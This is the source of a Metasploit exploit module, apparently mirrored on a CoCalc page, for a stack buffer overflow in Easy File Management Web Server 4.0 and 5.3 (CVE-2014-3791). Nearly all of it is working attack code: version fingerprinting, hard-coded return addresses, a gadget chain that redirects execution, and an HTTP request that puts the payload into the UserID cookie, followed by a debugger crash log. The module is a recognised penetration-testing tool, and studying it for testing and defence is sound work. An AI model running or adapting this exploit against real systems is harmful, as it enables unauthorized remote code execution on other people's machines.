CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/efs_fmws_userid_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking # Reliable memory corruption78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Easy File Management Web Server Stack Buffer Overflow',13'Description' => %q{14Easy File Management Web Server v4.0 and v5.3 contains a stack buffer15overflow condition that is triggered as user-supplied input is not16properly validated when handling the UserID cookie. This may allow a17remote attacker to execute arbitrary code.18},19'Author' =>20[21'superkojiman', # Vulnerability discovery22'Julien Ahrens', # Exploit23'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module24],25'License' => MSF_LICENSE,26'References' =>27[28['CVE', '2014-3791'],29['OSVDB', '107241'],30['EDB', '33610'],31['BID', '67542'],32['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'],33['URL', 'http://www.web-file-management.com/']34],35'Platform' => 'win',36'Arch' => ARCH_X86,37'DefaultOptions' =>38{39'EXITFUNC' => 'process'40},41'Payload' =>42{43'BadChars' => "\x00\x0a\x0d;",44'Space' => 3420 # Lets play it safe45},46'Targets' =>47[48# Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on:49# -- Microsoft Windows XP [Version 5.1.2600]50# -- Microsoft Windows [Version 6.1.7600]51# -- Microsoft Windows [Version 6.3.9600]52['Automatic Targeting', { 'auto' => true }],53['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }],54['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }],55# 0x10010101 = pop ebx > pop ecx > retn56# 0xA445ABCF = 0x514CF5 push esp > retn 0c57# 0xA4518472 = 0x457452 jmp esp58# From ImageLoad.dll59],60'DisclosureDate' => '2014-05-20',61'DefaultTarget' => 0))6263register_options(64[65OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp'])66])67end6869def get_version7071#72# NOTE: Version 5.3 still reports "4.0" in the "Server" header73#7475version = nil76res = send_request_raw({'uri' => '/whatsnew.txt'})7778unless res79vprint_error 'Connection failed'80return nil81end8283if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/84version = $185vprint_status "Found version: #{version}"86elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/87version = $188vprint_status "Based on Server header: #{version}"89end9091version92end9394def check95code = Exploit::CheckCode::Safe96version = get_version97if version.nil?98code = Exploit::CheckCode::Unknown99elsif version == "5.3"100code = Exploit::CheckCode::Appears101elsif version == "4.0"102code = Exploit::CheckCode::Appears103end104105code106end107108def exploit109110#111# Get target version to determine how to reach call/jmp esp112#113114print_status("Fingerprinting version...")115version = get_version116117if target.name =~ /Automatic/118if version.nil?119fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")120elsif version =~ /5\.3/121my_target = targets[1]122elsif version =~ /4\.0/123my_target = targets[2]124end125print_good("Version #{version} found")126else127my_target = target128unless version && my_target.name.include?(version)129print_error("The selected target doesn't match the detected version, trying anyway...")130end131end132133#134# Fu to reach where payload lives135#136137sploit = rand_text(80) # Junk138sploit << [0x1001D8C8].pack("V") # Push edx139sploit << rand_text(280) # Junk140sploit << [my_target.ret].pack("V") # Pop ebx > pop ecx > retn141sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp142sploit << [0x10010125].pack("V") # Contains 00000000 to pass the jnz instruction143sploit << [0x10022AAC].pack("V") # Mov eax,ebx > pop esi > pop ebx > retn144sploit << rand_text(8) # Filler145sploit << [0x1001A187].pack("V") # Add eax,5bffc883 > retn146sploit << [0x1002466D].pack("V") # Push eax > retn147sploit << payload.encoded148149print_status "Trying target #{my_target.name}..."150151#152# NOTE: Successful HTTP request is required to trigger153#154155send_request_cgi({156'uri' => normalize_uri(target_uri.path),157'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;",158}, 1)159end160end161162=begin163164#165# 0x44f57d This will write UserID up the stack. If the UserID is to large it166# will overwrite a pointer which is used later on at 0x468702167#168169eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac170eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0 nv up ei pl nz na po nc171cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202172fmws+0x4f57d:1730044f57d f3a5 rep movs dword ptr es:[edi],dword ptr [esi]1740:004> dd @esi17501668084 41414141 41414141 41414141 4141414117601668094 41414141 41414141 41414141 41414141177016680a4 41414141 41414141 41414141 41414141178016680b4 41414141 41414141 41414141 41414141179016680c4 41414141 41414141 41414141 41414141180016680d4 41414141 41414141 41414141 41414141181016680e4 41414141 41414141 41414141 41414141182016680f4 41414141 41414141 41414141 41414141183184(c38.8cc): Access violation - code c0000005 (first chance)185First chance exceptions are reported before any exception handling.186This exception may be expected and handled.187eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc188eip=00468702 esp=015197c0 ebp=ffffffff iopl=0 nv up ei pl nz na pe nc189cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206190fmws+0x68702:19100468702 ff5228 call dword ptr [edx+28h] ds:0023:41414169=????????192193=end194195196